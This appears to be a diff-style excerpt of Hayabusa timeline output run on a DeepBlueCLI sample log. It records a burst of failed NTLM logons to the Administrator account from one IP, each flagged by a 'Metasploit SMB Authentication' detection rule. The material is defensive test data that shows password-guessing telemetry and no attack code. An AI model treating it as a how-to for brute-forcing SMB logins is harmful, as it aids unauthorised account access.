+2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OGl1Tbdw7PDvVsRR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uspHTc4JwnjjZQti  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8Exq3nfy1LeFOPcA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vdFC4g7vsLO0zOzL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HpdCohLheoqQ6DXw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xHS3sclMwgHuH8rE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sNSheImuQwgOEH5g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GX5y374mlYYXbAB2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eaFRL6q9KQY5bFHZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MrkEyJmfLiSrvQGs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fd1vJiJa3pdjqdQV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RVrZl3LOIa7VLhT7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TKR8KbyQkwRX1qTE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GY22XuDxbE5lvEra  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4AntiX3j9HLHcOOq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XIvMbod41WeNADy5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0UL4lb3CCrv7YfGQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OyRktDjPqFyrdSTQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HKEGmAH8Wbc7f3jC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 06Dfi4lO2Vdw3gCr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 29eXmenUTACkAHKC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Zq7Gl6hnKDJJqFc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jKENlWYt6m78taZR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 822SUU2Hg6w6AqQh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bROU0Mk9Z4yEq323  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EKfVPleDpLLqkuKq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NGWVqbchMitnLVYT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y7K9vifU9lWwpP9J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oIgKYj210JfICJXv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jisuKilPQivTV8yE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hckyoom0XnqpRzK8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: De0l6qgcuhMERjMY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SSa7pylPWn8jl2Ox  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ol9OntO4hqidlNUi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kXOBF0ZWLxMauHuT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WVBFJltkR5vnmpYD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kHVXEHq9zNYdfTpZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OIw3BxmLsfwDXXFg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hhgRhjnhkRJus4fw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xz78guWXrekEvuFT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 04wNT26RJmriQrfH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XmbuuymdSpfNldt2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yqJarBVOImq5Tn2p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BZYExQroYH65tPuG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: llU5DQBrIrV3VtG5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
